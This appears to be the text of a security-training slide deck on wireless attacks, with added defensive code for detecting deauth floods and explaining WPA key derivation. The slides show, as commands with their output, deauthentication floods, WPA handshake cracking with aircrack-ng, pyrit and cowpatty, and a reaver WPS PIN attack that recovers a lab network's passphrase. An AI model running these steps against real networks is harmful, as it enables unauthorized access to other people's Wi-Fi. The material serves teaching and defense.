39968 377.086048 D-Link_74:15:28 -> D-Link_50:2f:2e EAPOL 160 Key (msg 2/4)
39969 377.089080 D-Link_50:2f:2e -> D-Link_74:15:28 EAPOL 187 Key (msg 3/4)
39971 377.104480 D-Link_74:15:28 -> D-Link_50:2f:2e EAPOL 136 Key (msg 4/4)
aireplay-ng --deauth 100 -c 00:26:5A:74:15:28 -e dlink mon0
08:49:22 Waiting for beacon frame (ESSID: dlink) on channel 6
Found BSSID "00:1B:11:50:2F:2E" to given ESSID "dlink".
08:49:22 Sending 64 directed DeAuth. STMAC: [00:26:5A:74:15:28] [ 0|63 ACKs]
wpa_supplicant -Dwext -iwlan4 -c/etc/wpa_supplicant/wpa.conf
Trying to associate with 00:1b:11:50:2f:2e (SSID='dlink' freq=2437 MHz)
Associated with 00:1b:11:50:2f:2e
WPA: Key negotiation completed with 00:1b:11:50:2f:2e [PTK=CCMP GTK=CCMP]
CTRL-EVENT-CONNECTED - Connection to 00:1b:11:50:2f:2e completed (auth) [id=1 id_str=]
CTRL-EVENT-DISCONNECTED - Disconnect event - remove keys
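The deauth run above shows both sides of the event: aireplay-ng sends 64 directed DeAuth frames and the client's wpa_supplicant logs CTRL-EVENT-DISCONNECTED. From the monitoring side this is an easy signature. The following is an added example, not from the original deck, that reads tcpdump-style monitor-mode lines (the format used on the earlier slides) and raises an alert when one BSSID is named in more deauthentication/disassociation frames than a threshold within a sliding one-second window. The capture lines are constructed to mimic that 64-frame burst and reuse the BSSID and station MAC printed above; the threshold of 10 is the example's own choice.

```python
"""Detect deauthentication floods in monitor-mode capture text.

Added example, not part of the original slide deck: reads tcpdump-style
lines from a monitor interface (the same style as the captures on the
slides) and alerts when one BSSID appears in more DeAuthentication or
Disassociation frames than a threshold within a sliding one-second window.
The capture below is constructed to mimic the "Sending 64 directed DeAuth"
burst shown on the slides, reusing the BSSID and station MACs printed there.
"""
import re
from collections import defaultdict, deque
from dataclasses import dataclass

FRAME_RE = re.compile(
    r"^(?P<ts>\d{2}:\d{2}:\d{2}\.\d+).*?BSSID:(?P<bssid>[0-9a-f:]{17})\s+"
    r"DA:(?P<da>[0-9a-f:]{17})\s+SA:(?P<sa>[0-9a-f:]{17}).*?"
    r"\b(?P<kind>DeAuthentication|Disassociation)\b")


@dataclass
class Alert:
    bssid: str      # network the frames claim to come from
    target: str     # DA of the frame that crossed the threshold
    start: float    # seconds since midnight of the first frame in the window
    count: int


def seconds(ts: str) -> float:
    h, m, s = ts.split(":")
    return int(h) * 3600 + int(m) * 60 + float(s)


def detect(lines, threshold: int = 10, window: float = 1.0) -> list:
    """One Alert per burst: raised when the window first reaches `threshold`."""
    recent = defaultdict(deque)          # bssid -> timestamps of deauth frames
    alerts = []
    for line in lines:
        m = FRAME_RE.search(line)
        if not m:
            continue                     # beacons, data, probes: ignored
        t, q = seconds(m["ts"]), recent[m["bssid"]]
        q.append(t)
        while t - q[0] > window:         # slide the window forward
            q.popleft()
        if len(q) == threshold:          # crosses exactly once per burst
            alerts.append(Alert(m["bssid"], m["da"], q[0], len(q)))
    return alerts


def sample_capture() -> list:
    """Constructed capture: one beacon, one routine deauth, then a 64-frame burst."""
    deauth = ("{ts} 1.0 Mb/s 2437 MHz 11b -40dB signal antenna 1 "
              "BSSID:00:1b:11:50:2f:2e DA:{da} SA:00:1b:11:50:2f:2e "
              "DeAuthentication (00:1b:11:50:2f:2e): {reason}")
    lines = [
        "08:49:20.004113 1.0 Mb/s 2437 MHz 11b -40dB signal antenna 1 "
        "BSSID:00:1b:11:50:2f:2e DA:ff:ff:ff:ff:ff:ff SA:00:1b:11:50:2f:2e "
        "Beacon (dlink) [1.0* 2.0* 5.5* 11.0* Mbit] ESS CH: 6, PRIVACY",
        deauth.format(ts="08:49:20.512330", da="00:18:77:7c:2c:a7",
                      reason="Deauthenticated because sending station is leaving (or has left) IBSS or ESS"),
    ]
    for i in range(64):                  # 64 frames in about 0.45 s, as on the slide
        lines.append(deauth.format(ts=f"08:49:22.{100000 + i * 7000:06d}",
                                   da="00:26:5a:74:15:28",
                                   reason="Class 3 frame received from nonassociated station"))
    return lines


if __name__ == "__main__":
    for a in detect(sample_capture()):
        print(f"deauth flood: {a.count} frames for {a.bssid} -> {a.target} "
              f"within 1 s from t={a.start:.3f}")
```

A healthy AP sends deauth frames rarely, so tens per second against one BSSID, carrying the AP's own address in SA, is either a misbehaving driver or a forged flood. The frames can be forged at all because 802.11 management frames are unauthenticated unless the network enables 802.11w (Protected Management Frames), under which a client discards deauth frames without a valid MIC; enabling it is the mitigation, and a wireless IDS such as Kismet can run this kind of rule continuously and correlate it with the client-side disconnect events shown above.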
aircrack-ng dlink-01.cap
Opening dlink-01.cap
Read 60093 packets.

# BSSID ESSID Encryption

1 00:1B:11:50:2F:2E dlink WPA (1 handshake)

Aircrack-ng 1.1

[00:01:09] 88192 keys tested (1274.66 k/s)
KEY FOUND! [ pxxxxxxxxxxxxxxxx ]
Master Key : E3 C5 0B 41 F1 8B 96 00 4B E1 AF F8 D9 67 0F 1F
D4 63 BA F0 0B 8A 2C 55 5F DD 5F 58 21 03 CE E4
Transient Key : 00 C8 D3 4D C1 7A 8B D5 57 3C FB 5B 86 D5 56 09
57 FA 29 9E 1E 2D A3 27 C1 19 07 4F 76 0C 25 57
A8 E8 F0 69 14 DE F7 18 FE EB 41 55 A4 17 87 CC
01 F9 F9 A4 87 95 C7 1C 90 BD 12 B4 CC 63 9A C3
EAPOL HMAC : 17 4A DB 11 5A AE 52 D6 CF E6 E4 2A 96 1D FB D2
real 1m9.538s
user 4m18.786s
sys 0m0.629s
time aircrack-ng -w popular_ptBR.dic dlink-01.cap
time genpmk -f 234k_pt-br_popular.dic -d dlink234.pmk -s dlink
[]

109216 passphrases tested in 542.98 seconds: 201.14 passphrases/second

real 9m2.988s
user 9m2.468s
sys 0m0.414s
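genpmk and pyrit both run the computation a supplicant performs when it joins a WPA(2)-PSK network, and the figures above (109216 passphrases in 542.98 seconds) are a direct measure of its cost. The following is an added example, not from the original deck, that derives the PMK as IEEE 802.11i specifies (PBKDF2-HMAC-SHA1, 4096 rounds, the SSID as salt, 32-byte output) and uses it to show why a precomputed table is bound to one SSID and how the fixed per-guess cost bounds dictionary throughput. The ("password", "IEEE") pair is the standard's published test vector; the candidate list and the "dlink-office" SSID are constructed.

```python
"""Why genpmk/pyrit tables are per-SSID: WPA(2)-PSK key derivation.

Added example, not part of the original slide deck. Derives the pairwise
master key exactly as a supplicant does (IEEE 802.11i: PBKDF2-HMAC-SHA1,
4096 rounds, SSID as salt, 256-bit output), which is what genpmk and pyrit
precompute, and shows two things a defender cares about: a table built for
one SSID is useless against any other SSID, and the fixed per-guess cost is
what bounds the passphrases/second figures on the slides. ("password",
"IEEE") is the standard's published test vector; the candidate passphrases
and the "dlink-office" SSID are constructed.
"""
import hashlib
import time


def pmk(passphrase: str, ssid: str) -> bytes:
    """802.11i PSK mapping: PMK = PBKDF2(HMAC-SHA1, passphrase, ssid, 4096, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def build_table(ssid: str, candidates) -> dict:
    """A PMK -> passphrase table for ONE ssid; this is what genpmk/pyrit write out."""
    return {pmk(p, ssid): p for p in candidates}


def ssid_binding_demo():
    """Same passphrase, two SSIDs: only the SSID the table was built for matches."""
    table = build_table("dlink", ["password", "12345678", "labvirus2013"])  # constructed
    return (table.get(pmk("12345678", "dlink")),          # found
            table.get(pmk("12345678", "dlink-office")))   # None: different salt


def pmk_rate(samples: int = 20) -> float:
    """Measured PMK derivations per second on this CPU (one guess = one PMK)."""
    t0 = time.perf_counter()
    for i in range(samples):
        pmk(f"candidate-{i}", "constructed-ssid")
    return samples / (time.perf_counter() - t0)


def seconds_to_exhaust(dictionary_size: int, rate: float) -> float:
    """Worst-case time to try a whole dictionary at `rate` PMKs per second."""
    return dictionary_size / rate


if __name__ == "__main__":
    print(pmk("password", "IEEE").hex())        # 802.11i test vector
    print(ssid_binding_demo())                   # ('12345678', None)
    r = pmk_rate()
    print(f"{r:.0f} PMK/s here; 109216 words would take "
          f"{seconds_to_exhaust(109216, r):.0f} s")
```

Three defender conclusions follow from the code. The SSID is the salt, so a network that keeps a factory-default name (dlink, linksys) can be attacked with a table built once for everyone, while a unique SSID forces the attacker to start from zero. The 4096-round cost is fixed by the standard, so passphrase length and randomness are the only lever on the PSK side: a long random passphrase puts any dictionary out of reach whatever the PMK/s figure. And 802.1X/EAP (the MGT networks in the airodump-ng tables) removes the shared passphrase altogether.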
time pyrit -i popular.dic -o dlink.pmk -e dlink passthrough
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Computed 109216 PMKs total, 1863 PMKs per second

real 1m20.753s
user 3m2.437s
sys 0m0.733s

Cowpatty
cowpatty -d dlinkpop.pmk -s dlink -r dlink-01.cap
cowpatty 4.6 - WPA-PSK dictionary attack. <jwright@hasborg.com>

Collected all necessary data to mount crack against WPA2/PSK passphrase.
Starting dictionary attack. Please be patient.
key no. 10000: 22222222
key no. 20000: 93833104
key no. 30000: And48360
key no. 40000: Cib00043
key no. 50000: enqetm17
key no. 60000: hamdan00
key no. 70000: liberta10
key no. 80000: Mii08187

The PSK is "pxxxxxxxxxxxxxxxxxx".

89038 passphrases tested in 0.68 seconds: 130724.27 passphrases/second
Cowpatty
time pyrit -r dlink-01.cap -i pt-br_popular.dic attack_passthrough
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Parsing file 'dlink-01.cap' (1/1)...
Parsed 19 packets (19 802.11-packets), got 1 AP(s)

Picked AccessPoint 00:1b:11:50:2f:2e ('dlink') automatically.
Tried 109216 PMKs so far; 1870 PMKs per second.

The password is pxxxxxxxxxxxxx'.

real 1m21.027s
user 5m5.224s
sys 0m0.724s
Pyrit
pyrit benchmark
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Running benchmark (1239.9 PMKs/s)... \

Computed 1239.93 PMKs/s total.
#1: 'CPU-Core (SSE2)': 331.4 PMKs/s (RTT 3.0)
#2: 'CPU-Core (SSE2)': 332.1 PMKs/s (RTT 3.1)
#3: 'CPU-Core (SSE2)': 331.7 PMKs/s (RTT 3.0)
#4: 'CPU-Core (SSE2)': 331.3 PMKs/s (RTT 3.1)
Pyrit
pyrit benchmark
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Running benchmark (1880.5 PMKs/s)... /

Computed 1880.52 PMKs/s total.
#1: 'CUDA-Device #1 'GeForce 320M'': 1588.4 PMKs/s (RTT 2.7)
#2: 'CPU-Core (SSE2)': 361.3 PMKs/s (RTT 2.9)
WPS attack

Wi-Fi Protected Setup

Recover configuration

Reconfigure AP

Register
PIN
# wash -i mon0

Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

BSSID Channel RSSI WPS Version WPS Locked ESSID
---------------------------------------------------------------------------------------------------
48:58:39:80:D0:2C 3 -34 1.0 No LABVIRUS
# reaver -i mon0 -b 48:58:39:80:D0:2C -v

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Waiting for beacon from 48:58:39:80:D0:2C
[+] Associated with 48:58:39:80:D0:2C (ESSID: LABVIRUS)
[+] Trying pin 12343670
[+] WPS PIN: 12343670
[+] WPA PSK: labvirus2013
[+] AP SSID: LABVIRUS
Doubts?
Questions?
Criticism?
Suggestions?
Follow Clavis
http://clav.is/slideshare

http://clav.is/twitter

http://clav.is/facebook

Thank you very much!
monitoria@clavis.com.br
academia@clavis.com.br
Nelson Murilo
Clavis Segurança da Informação